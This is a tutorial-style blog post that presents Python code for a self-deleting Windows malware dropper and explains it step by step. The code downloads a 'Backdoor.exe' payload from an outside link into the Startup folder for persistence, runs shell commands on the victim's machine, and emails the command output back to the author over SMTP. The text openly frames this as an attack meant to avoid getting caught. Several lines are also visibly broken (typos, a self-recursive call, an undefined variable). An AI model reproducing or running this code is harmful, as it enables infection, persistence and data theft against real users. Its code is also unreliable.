A Python Malware That Will Destroy It Self After Execution.
Malware is a piece of code intended to damage, disrupt or steal information from the victim's computer.
Python is an interpreted, object-oriented high-level language that is very handy for the attackers while performing an attack the reason is the vast library support that comes with python, almost anything you could think of someone has already built it using python. This gives a huge advantage to the malware authors as simplistic capabilities can be cherry-picked from the open web and more complex capabilities likely don’t need to be written from scratch so this is the short intro to why malware author uses python for malware development but we are here to discuss the live application which is forged using the python. so let's dive directly into the raw python code.
[+] The Requirements Of Writing This Malware Are:
1-Install Python 2.7 Or Higher.
2-Install Pycharm Community Edition.
3-Offensive Mindset.
Let's Start Typing Some Code
import requests, subprocess, smtplib, os, timewhy malware author needs to import these modules the reason is the “request module” will help the malware author to get a response from the malicious link, the malicious link can contain anything a Backdoor, Keylogger, Credential Harvester, etc. Then talking about the “subprocess module” is for executing the commands in the victims' computer so that the malware author can execute the malware that is downloaded in the victim's computer. The “SMTP module” is for sending the execution response from the victim's computer to the malware author computer again “os module” is for interaction with the victim's computer and time is used for the giving a gap between two executing commands so the malware will not crash or malfunction at the time of execution.
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") a outfile:
outfile.write(get_response.content)So here malware author created a function that gets the response from the malicious link after that it will split the link content into a list and using the last element as the name of the file then write all the binary content into it.
def send_mail(email, password, message):
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()The reason for creating this function is to send the executed data with help of email from the victims' computer to the malware author computer.
def command_execution():
os.chdir("C:\Windows\Start Menu\Programs\Startup")
command1 = "cd C:\Windows\Start Menu\Programs\Startup"
command2 = "Malware.exe"
data1 = subprocess.check_output(command1, shell=True)
data2 = subprocess.check_ouput(command2, shell=True)
download("https://1drv.ms/u/Backdoor.exe")
send_mail(email="YourEmailAddress_Here", password="YourPass_Here",message=data1)
command_execution()
os.remove(file_name)we can see the function is created and named as the command_exection function which means that it will interact with the victim computer so, in the first line inside the function the malware author is changing the directory where the malware is gonna land from the link which is the startup directory of the victim's computer why he chose the startup directory the reason is whenever the victim will open the device it will automatically execute is self so by this the malware author will get persistence on the victim's machine moving to the next lines we are commanding the victim's command-line console to check the output then it is getting saved in the variable and later that data which is stored in the variable is sent to the malware author for the confirmation that your malware worked and the victim is infected and at end of the line, you can see the “os. remove” command which is the key feature of this malware after execution and giving the reverse connection back to malware author it will remove itself so there less chance of getting caught.
Thanks For Reading…!!
You can find me on:
LinkedIn:-https://www.linkedin.com/in/amaansid/
Twitter- https://twitter.com/TronicFlux
Company(LinkedIn)-https://www.linkedin.com/company/acubesecurity/
